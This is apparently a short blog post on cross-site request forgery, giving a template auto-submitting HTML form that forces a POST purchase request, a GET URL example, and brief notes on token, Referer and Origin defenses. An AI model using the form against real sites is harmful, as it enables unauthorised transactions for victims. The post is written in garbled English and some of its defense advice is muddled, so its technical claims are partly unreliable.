CSRF|About csrf attack and how to defense think deeply

Posted 2021-02-10 l0cm

About csrf attack and how to defense think deeply

 

About CSRF:

　　CSRF(Cross-site request forgery),Maybe most secrity pepole konw crsf what it look like XSS,but it is considered more dangerous than xss.

Developer Eyes:

　　As a developer,you must to konw csrf request methods，so csrf request methods is roughly divided into POST and GET types.

About POST request types:

　　scenario: pay money for buy computer

　　so,you can look URL:xxx.xxx.xxx/buy.php?id=xxx,if attack find csrf debug and sonstructor html POC submit Post request types.

　　

<form method="POST" action="xxx.xxx.xxx/buy.php?id=xxx" enctype="multipart/form-data"> 

    <input type="hidden" name="money" value="xxx"/> 
    .....
</form> 
<script> 
    document.forms[0].submit();
</script>

 

About GET request types:

　　scenario: pay money for buy computer

　　shop return URL:xxx.xxx.xxx/buy.php?id=xxx&submit_id=1&money=199&user=test

Develop environment how to defense csrf?

　　In general,3 methods for example validation token and referce and return Code,but like PayPal will validation cookie or session.someone will stop no Origin.

Attacker how to find csrf and using?

　　Under certain conditions,testing we can find exposed value and test some URL request ,try use different user name into test CSRF effectiveness.

 

End

　　this is  defense think deeply head,so will write about CSRF using or about exposed debug.